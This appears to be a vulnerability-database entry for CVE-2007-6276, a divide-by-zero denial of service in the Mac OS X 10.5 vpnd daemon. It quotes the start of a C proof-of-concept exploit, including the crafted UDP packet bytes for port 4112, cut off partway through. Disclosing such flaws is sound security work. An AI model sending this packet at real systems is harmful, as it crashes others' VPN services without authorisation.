CVE-2007-6276: The accept_connections function in the virtual private network daemon (vpnd) in Apple Mac OS X 10.5 before 10.5.4 allows remote attackers to cause a denial of…

CVE-2007-6276 [HIGH] GHSA-9fjr-c564-rwj5: The accept_connections function in the virtual private network daemon (vpnd) in Apple Mac OS X 10 The accept_connections function in the virtual private network daemon (vpnd) in Apple Mac OS X 10.5 before 10.5.4 allows remote attackers to cause a denial of service (divide-by-zero error and daemon crash) via a crafted load balancing packet to UDP port 4112.

CVE-2007-6276 Apple Mac OSX 10.5.0 (Leopard) - vpnd Remote Denial of Service (PoC) Apple Mac OSX 10.5.0 (Leopard) - vpnd Remote Denial of Service (PoC) --- /* vpnd-leopard-lb-dos.c * * Copyright (c) 2007 by * * Apple MACOS X 10.5.0 (leopard) vpnd remote DoS POC * by mu-b - Fri 9 Nov 2007 * * - Tested on: Apple MACOS X 10.5.0 (leopard) vpnd * * Program received signal EXC_ARITHMETIC, Arithmetic exception. * 0x00004828 in accept_connections () * * - Private Source Code -DO NOT DISTRIBUTE - * http://www.digit-labs.org/ -- Digit-Labs 2007!@$! */ #include #include #include #include #include #include #include #include #define DEF_PORT 4112 #define PORT_VPND DEF_PORT static char abuf[] = "\x00\x01\x00\x18" "\x00\x00\x00\x00" "\xd5\xa5\xf9\xc3" "\x00\x00" /* [edi+0Ch] -> ecx == 0 */ "\x00\x00\x00\x00" "\x00\x00\x00\x00" "\x00\x00"; static void zattack (char *host); stati